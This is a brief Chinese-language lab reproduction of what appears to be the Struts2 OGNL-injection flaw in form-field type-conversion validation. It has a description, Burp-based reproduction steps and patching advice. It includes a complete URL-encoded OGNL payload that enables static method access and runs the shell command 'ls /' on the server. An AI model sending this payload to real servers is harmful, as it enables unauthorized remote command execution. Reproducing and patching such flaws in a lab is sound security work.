漏洞描述:
age来自于用户输入,传递一个非整数给id会导致错误,struts会将用户的输入,当作OGNL表达式执行,从而导致了漏洞。
UserAction-validation.xml配置的验证规则。如果类型验证转换失败,则服务器将拼接用户提交的表单值字符串,然后执行OGNL表达式解析并返回。
复现过程:
1.访问http://ip:port,出现如下页面,开始实验
2.验证漏洞是否存在
3.burp抓包,修改post请求,查找底层目录信息
%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context %5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40 getRuntime%28%29.exec%28%27ls%20/%27%29.getInputStream%28%29%29%29+%2B+%27
修复建议:
- 打补丁。
- 类似于 sql 注入的 addslashes,对其中的单引号进行了转义,在 getOverrideExpr函数中进行了 StringEscape,从而无法闭合单引号,也就无法构造 OGNL 表达式。